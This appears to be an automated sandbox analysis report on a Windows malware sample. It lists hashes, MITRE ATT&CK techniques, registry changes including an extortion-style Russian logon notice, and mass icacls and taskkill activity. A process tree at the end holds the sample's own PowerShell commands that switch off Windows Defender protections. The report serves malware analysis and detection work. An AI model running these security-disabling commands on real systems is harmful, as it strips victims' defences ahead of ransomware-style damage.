936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd

Resubmissions

29-10-2021 14:51

211029-r8nn1aacaj 10

23-03-2021 18:12

210323-s8jdk5y98j 10

Analysis

max time kernel
100s
max time network
142s
platform
windows10_x64
resource
win10v20201028
submitted
23-03-2021 18:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
Size

296KB
MD5

6b2c7d5298c7fb8f4c4c3531894a91c1
SHA1

d7333af03603b27566ac8ab63d6aa21575e1ebb4
SHA256

936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd
SHA512

2555a572e9088ce58dce5bcaf1c0fca76727b6a1e1315ec0dbfe588a796faf1d083cb6ff3a6362f7c8075a4f321228c6227db7a3207fa557fff68e9fd4a3e114

Score

10^/10

discovery evasion persistence trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Disables Task Manager via registry modification
evasion
Executes dropped EXE 2 IoCs

Processes:

yrbyuioh.exedismhost.exe

pid process

15088 yrbyuioh.exe
10156 dismhost.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Loads dropped DLL 5 IoCs

Processes:

dismhost.exe

pid process

10156 dismhost.exe
10156 dismhost.exe
10156 dismhost.exe
10156 dismhost.exe
10156 dismhost.exe

pid	process
15088	yrbyuioh.exe
10156	dismhost.exe

pid	process
10156	dismhost.exe
10156	dismhost.exe
10156	dismhost.exe
10156	dismhost.exe
10156	dismhost.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
7404	icacls.exe
10968	icacls.exe
4372	icacls.exe
6212	icacls.exe
4376	icacls.exe
6696	icacls.exe
13348	icacls.exe
14596	icacls.exe
9028	icacls.exe
9008	icacls.exe
11080	icacls.exe
8796	icacls.exe
6440	icacls.exe
5488	icacls.exe
13148
14608	icacls.exe
13424	icacls.exe
13856	icacls.exe
6616	icacls.exe
9728	icacls.exe
16260	icacls.exe
5452	icacls.exe
10556
6992	icacls.exe
13308	icacls.exe
11716	icacls.exe
15416	icacls.exe
13928	icacls.exe
7488	icacls.exe
5784	icacls.exe
9488
9332	icacls.exe
13628	icacls.exe
16164	icacls.exe
12792	icacls.exe
10904
15304	icacls.exe
15592	icacls.exe
16364	icacls.exe
8356	icacls.exe
9728
15664
9128	icacls.exe
5380	icacls.exe
14412	icacls.exe
9132	icacls.exe
8524
11588	icacls.exe
15952
5952
9056	icacls.exe
17360	icacls.exe
12256	icacls.exe
14692	icacls.exe
16348	icacls.exe
11580	icacls.exe
4108	icacls.exe
17264	icacls.exe
10956	icacls.exe
7164	icacls.exe
4820	icacls.exe
17276	icacls.exe
11568
8348	icacls.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Внимание Внимание Внимание!!!"	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "У вас сложности с IT безопасностью?\r\n\r\nНаши специалисты Вам гарантировано помогут.\r\n\r\nДля этого напишите нам на почту - [email protected]"	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe

Drops file in Program Files directory 1 IoCs

Processes:

936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\VSTOFiles.cat	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe

Drops file in Windows directory 2 IoCs

Processes:

powershell.exedismhost.exe

description	ioc	process
File opened for modification	C:\Windows\Logs\DISM\dism.log	powershell.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Discovers systems in the same network 1 TTPs 1 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exe

pid process

12308 net.exe

pid	process
12308	net.exe

Kills process with taskkill 57 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
11380	taskkill.exe
11340	taskkill.exe
4256	taskkill.exe
11120	taskkill.exe
11540	taskkill.exe
11444	taskkill.exe
11228	taskkill.exe
9956	taskkill.exe
11420	taskkill.exe
11388	taskkill.exe
11364	taskkill.exe
10076	taskkill.exe
4736	taskkill.exe
11412	taskkill.exe
11316	taskkill.exe
11236	taskkill.exe
11524	taskkill.exe
11372	taskkill.exe
11288	taskkill.exe
11268	taskkill.exe
11428	taskkill.exe
11404	taskkill.exe
11508	taskkill.exe
11500	taskkill.exe
11484	taskkill.exe
11452	taskkill.exe
11516	taskkill.exe
11332	taskkill.exe
11164	taskkill.exe
11128	taskkill.exe
10568	taskkill.exe
11244	taskkill.exe
11216	taskkill.exe
11532	taskkill.exe
11492	taskkill.exe
11468	taskkill.exe
11276	taskkill.exe
11476	taskkill.exe
11396	taskkill.exe
10044	taskkill.exe
11324	taskkill.exe
11260	taskkill.exe
11184	taskkill.exe
11348	taskkill.exe
11296	taskkill.exe
11140	taskkill.exe
11460	taskkill.exe
11436	taskkill.exe
11308	taskkill.exe
11204	taskkill.exe
11196	taskkill.exe
11176	taskkill.exe
11152	taskkill.exe
11548	taskkill.exe
11356	taskkill.exe
9980	taskkill.exe
11252	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

4824 reg.exe
Runs net.exe

pid	process
4824	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe

pid	process
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetaskkill.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
Token: SeDebugPrivilege	416	powershell.exe
Token: SeIncreaseQuotaPrivilege	416	powershell.exe
Token: SeSecurityPrivilege	416	powershell.exe
Token: SeTakeOwnershipPrivilege	416	powershell.exe
Token: SeLoadDriverPrivilege	416	powershell.exe
Token: SeSystemProfilePrivilege	416	powershell.exe
Token: SeSystemtimePrivilege	416	powershell.exe
Token: SeProfSingleProcessPrivilege	416	powershell.exe
Token: SeIncBasePriorityPrivilege	416	powershell.exe
Token: SeCreatePagefilePrivilege	416	powershell.exe
Token: SeBackupPrivilege	416	powershell.exe
Token: SeRestorePrivilege	416	powershell.exe
Token: SeShutdownPrivilege	416	powershell.exe
Token: SeDebugPrivilege	416	powershell.exe
Token: SeSystemEnvironmentPrivilege	416	powershell.exe
Token: SeRemoteShutdownPrivilege	416	powershell.exe
Token: SeUndockPrivilege	416	powershell.exe
Token: SeManageVolumePrivilege	416	powershell.exe
Token: 33	416	powershell.exe
Token: 34	416	powershell.exe
Token: 35	416	powershell.exe
Token: 36	416	powershell.exe
Token: SeDebugPrivilege	1324	powershell.exe
Token: SeDebugPrivilege	1336	powershell.exe
Token: SeDebugPrivilege	3876	powershell.exe
Token: SeDebugPrivilege	1724	powershell.exe
Token: SeDebugPrivilege	2836	powershell.exe
Token: SeDebugPrivilege	2240	powershell.exe
Token: SeDebugPrivilege	3364	powershell.exe
Token: SeDebugPrivilege	4128	powershell.exe
Token: SeDebugPrivilege	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
Token: SeDebugPrivilege	4260	powershell.exe
Token: SeDebugPrivilege	4412	powershell.exe
Token: SeDebugPrivilege	4736	taskkill.exe
Token: SeDebugPrivilege	4512	powershell.exe
Token: SeDebugPrivilege	4628	powershell.exe
Token: SeIncreaseQuotaPrivilege	1324	powershell.exe
Token: SeSecurityPrivilege	1324	powershell.exe
Token: SeTakeOwnershipPrivilege	1324	powershell.exe
Token: SeLoadDriverPrivilege	1324	powershell.exe
Token: SeSystemProfilePrivilege	1324	powershell.exe
Token: SeSystemtimePrivilege	1324	powershell.exe
Token: SeProfSingleProcessPrivilege	1324	powershell.exe
Token: SeIncBasePriorityPrivilege	1324	powershell.exe
Token: SeCreatePagefilePrivilege	1324	powershell.exe
Token: SeBackupPrivilege	1324	powershell.exe
Token: SeRestorePrivilege	1324	powershell.exe
Token: SeShutdownPrivilege	1324	powershell.exe
Token: SeDebugPrivilege	1324	powershell.exe
Token: SeSystemEnvironmentPrivilege	1324	powershell.exe
Token: SeRemoteShutdownPrivilege	1324	powershell.exe
Token: SeUndockPrivilege	1324	powershell.exe
Token: SeManageVolumePrivilege	1324	powershell.exe
Token: 33	1324	powershell.exe
Token: 34	1324	powershell.exe
Token: 35	1324	powershell.exe
Token: 36	1324	powershell.exe
Token: SeIncreaseQuotaPrivilege	1336	powershell.exe
Token: SeSecurityPrivilege	1336	powershell.exe
Token: SeTakeOwnershipPrivilege	1336	powershell.exe
Token: SeLoadDriverPrivilege	1336	powershell.exe
Token: SeSystemProfilePrivilege	1336	powershell.exe
Token: SeSystemtimePrivilege	1336	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe

description	pid	process	target process
PID 728 wrote to memory of 416	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	powershell.exe
PID 728 wrote to memory of 416	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	powershell.exe
PID 728 wrote to memory of 1324	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	powershell.exe
PID 728 wrote to memory of 1324	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	powershell.exe
PID 728 wrote to memory of 1336	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	powershell.exe
PID 728 wrote to memory of 1336	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	powershell.exe
PID 728 wrote to memory of 3876	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	powershell.exe
PID 728 wrote to memory of 3876	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	powershell.exe
PID 728 wrote to memory of 1724	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	powershell.exe
PID 728 wrote to memory of 1724	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	powershell.exe
PID 728 wrote to memory of 2836	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	powershell.exe
PID 728 wrote to memory of 2836	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	powershell.exe
PID 728 wrote to memory of 2240	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	powershell.exe
PID 728 wrote to memory of 2240	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	powershell.exe
PID 728 wrote to memory of 3364	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	powershell.exe
PID 728 wrote to memory of 3364	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	powershell.exe
PID 728 wrote to memory of 4128	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	powershell.exe
PID 728 wrote to memory of 4128	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	powershell.exe
PID 728 wrote to memory of 4260	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	powershell.exe
PID 728 wrote to memory of 4260	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	powershell.exe
PID 728 wrote to memory of 4412	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	powershell.exe
PID 728 wrote to memory of 4412	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	powershell.exe
PID 728 wrote to memory of 4512	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	powershell.exe
PID 728 wrote to memory of 4512	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	powershell.exe
PID 728 wrote to memory of 4628	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	powershell.exe
PID 728 wrote to memory of 4628	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	powershell.exe
PID 728 wrote to memory of 4736	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	taskkill.exe
PID 728 wrote to memory of 4736	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	taskkill.exe
PID 728 wrote to memory of 4764	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	net.exe
PID 728 wrote to memory of 4764	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	net.exe
PID 728 wrote to memory of 4824	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	reg.exe
PID 728 wrote to memory of 4824	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	reg.exe
PID 728 wrote to memory of 4920	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	schtasks.exe
PID 728 wrote to memory of 4920	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	schtasks.exe
PID 728 wrote to memory of 5020	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	sc.exe
PID 728 wrote to memory of 5020	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	sc.exe
PID 728 wrote to memory of 5092	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	cmd.exe
PID 728 wrote to memory of 5092	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	cmd.exe
PID 728 wrote to memory of 4136	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	net.exe
PID 728 wrote to memory of 4136	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	net.exe
PID 728 wrote to memory of 3576	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	netsh.exe
PID 728 wrote to memory of 3576	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	netsh.exe
PID 728 wrote to memory of 4484	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	netsh.exe
PID 728 wrote to memory of 4484	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	netsh.exe
PID 728 wrote to memory of 4608	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	Conhost.exe
PID 728 wrote to memory of 4608	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	Conhost.exe
PID 728 wrote to memory of 3944	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	sc.exe
PID 728 wrote to memory of 3944	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	sc.exe
PID 728 wrote to memory of 3928	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	Conhost.exe
PID 728 wrote to memory of 3928	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	Conhost.exe
PID 728 wrote to memory of 4380	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	net.exe
PID 728 wrote to memory of 4380	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	net.exe
PID 728 wrote to memory of 4800	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	Conhost.exe
PID 728 wrote to memory of 4800	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	Conhost.exe
PID 728 wrote to memory of 4652	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	sc.exe
PID 728 wrote to memory of 4652	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	sc.exe
PID 728 wrote to memory of 5152	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	arp.exe
PID 728 wrote to memory of 5152	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	arp.exe
PID 728 wrote to memory of 5260	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	Conhost.exe
PID 728 wrote to memory of 5260	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	Conhost.exe
PID 728 wrote to memory of 5300	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	net.exe
PID 728 wrote to memory of 5300	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	net.exe
PID 728 wrote to memory of 5332	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	net.exe
PID 728 wrote to memory of 5332	728	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe	net.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Внимание Внимание Внимание!!!"	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "У вас сложности с IT безопасностью?\r\n\r\nНаши специалисты Вам гарантировано помогут.\r\n\r\nДля этого напишите нам на почту - [email protected]"	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe

C:\Users\Admin\AppData\Local\Temp\936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
"C:\Users\Admin\AppData\Local\Temp\936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe"
1⤵
- Modifies WinLogon
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:728
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:416
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1324
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1336
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3876
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1724
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2836
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2240
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
